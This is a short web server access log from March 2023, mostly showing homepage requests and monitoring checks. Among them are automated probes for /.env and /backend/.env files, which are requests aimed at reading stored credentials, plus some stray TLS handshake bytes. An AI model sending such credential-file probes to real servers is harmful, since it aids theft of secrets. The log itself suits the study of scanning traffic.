183.136.225.32 - - [03/Mar/2023:06:21:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
139.144.154.191 - - [03/Mar/2023:06:26:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
183.136.225.32 - - [03/Mar/2023:06:27:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [03/Mar/2023:06:27:18 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [03/Mar/2023:06:27:18 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
139.144.154.190 - - [03/Mar/2023:06:32:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
116.107.242.204 - - [03/Mar/2023:06:32:45 +0100] "GET /backend/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
116.107.242.204 - - [03/Mar/2023:06:32:46 +0100] "POST /backend HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
193.32.162.159 - - [03/Mar/2023:06:38:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
68.183.150.72 - - [03/Mar/2023:06:39:41 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
223.240.101.111 - - [03/Mar/2023:06:40:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
34.141.112.246 - - [03/Mar/2023:06:50:29 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
20.228.190.236 - - [03/Mar/2023:06:52:41 +0100] "GET /.env HTTP/1.1" 404 309 "-" "python-requests/2.28.2"
20.228.190.236 - - [03/Mar/2023:06:53:03 +0100] "GET /.env HTTP/1.1" 404 309 "-" "python-requests/2.28.2"
183.136.225.43 - - [03/Mar/2023:06:54:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
183.136.225.43 - - [03/Mar/2023:06:54:15 +0100] "\x16\x03\x01\x02" 501 319 "-" "-"
20.228.190.236 - - [03/Mar/2023:06:59:38 +0100] "GET /.env HTTP/1.1" 404 309 "-" "python-requests/2.28.2"
212.91.246.72 - - [03/Mar/2023:07:00:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
20.228.190.236 - - [03/Mar/2023:07:00:54 +0100] "GET /.env HTTP/1.1" 404 309 "-" "python-requests/2.28.2"
212.91.246.72 - - [03/Mar/2023:07:01:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:07:02:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:07:03:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
184.105.139.68 - - [03/Mar/2023:07:03:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.41"
212.91.246.72 - - [03/Mar/2023:07:04:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
161.35.88.188 - - [03/Mar/2023:07:04:25 +0100] "\x16\x03\x01" 501 318 "-" "-"
161.35.88.188 - - [03/Mar/2023:07:04:25 +0100] "\x16\x03\x01" 501 318 "-" "-"
161.35.88.188 - - [03/Mar/2023:07:04:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
